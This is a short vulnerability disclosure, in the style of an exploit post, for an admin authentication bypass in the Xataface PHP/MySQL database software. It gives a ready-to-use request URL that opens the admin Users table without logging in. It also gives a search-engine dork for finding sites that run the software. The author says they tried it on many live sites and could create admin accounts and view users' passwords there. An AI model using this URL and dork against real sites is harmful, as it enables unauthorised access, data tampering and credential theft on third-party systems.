=======================================================
Xataface Admin Auth Bypass Vulnerability
=======================================================
#[+] Discovered by : Xinapse
#[+] Site : firewire-security.com
#[+] Email : admin@firewire-security.com
=======================================================
=======================================================
#[+] Vulnerability : Admin/database auth bypass vulnerability
#[+] Software : Xataface - open source GPL, PHP, Mysql database
software
#[+] Vendor : http://xataface.com
#[+] Usage :
http://www.site.com/admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list
#[+] Alert : Most of the sites i tried running this software are
vulnerable, only a few used .htaccess
#[+] Dork :"powered by dataface" "powered by xataface"
#[+] Description : With this i could edit/delete/create records in the
database, create new admin accounts and view all the users and passwords.
#[+] Greetz :firewire-security team, b10h4z4rd, g3org3
